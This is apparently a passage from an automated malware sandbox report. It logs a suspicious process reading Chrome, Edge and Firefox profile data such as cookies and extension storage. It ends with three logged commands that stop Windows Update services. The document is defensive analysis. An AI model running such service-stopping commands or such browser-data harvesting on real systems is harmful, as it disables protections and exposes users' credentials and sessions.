                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\content-prefs.sqlite VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3 VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\attachments VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office Tools VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqlite VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0 VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0 VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office Tools VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\am VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\am VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\attachments VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ar VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\az VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Cache VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bg VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bg VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bn VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bn VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ca VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm\index-dir VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\cy VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\da VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\de VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_US VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_CA VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_GB VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm\index-dir VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\es_419 VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows PowerShell VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0 VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\am VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ar VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bn VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\cy VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js\index-dir VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\wasm VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\wasm\index-dir VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js\index-dir VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_CA VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\wasm VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\wasm\index-dir VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage VolumeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeCode function: 0_2_00DB037C GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_00DB037C
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 1_2_00007FF67D026470 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,1_2_00007FF67D026470
                                  Source: C:\Users\user\Desktop\8Ck8T5qRcC.exeCode function: 0_2_00D9D076 GetVersionExW,0_2_00D9D076
                                  Source: C:\ProgramData\Microsoft\hacn.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                                  Lowering of HIPS / PFW / Operating System Security Settings

                                  barindex
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop wuauserv
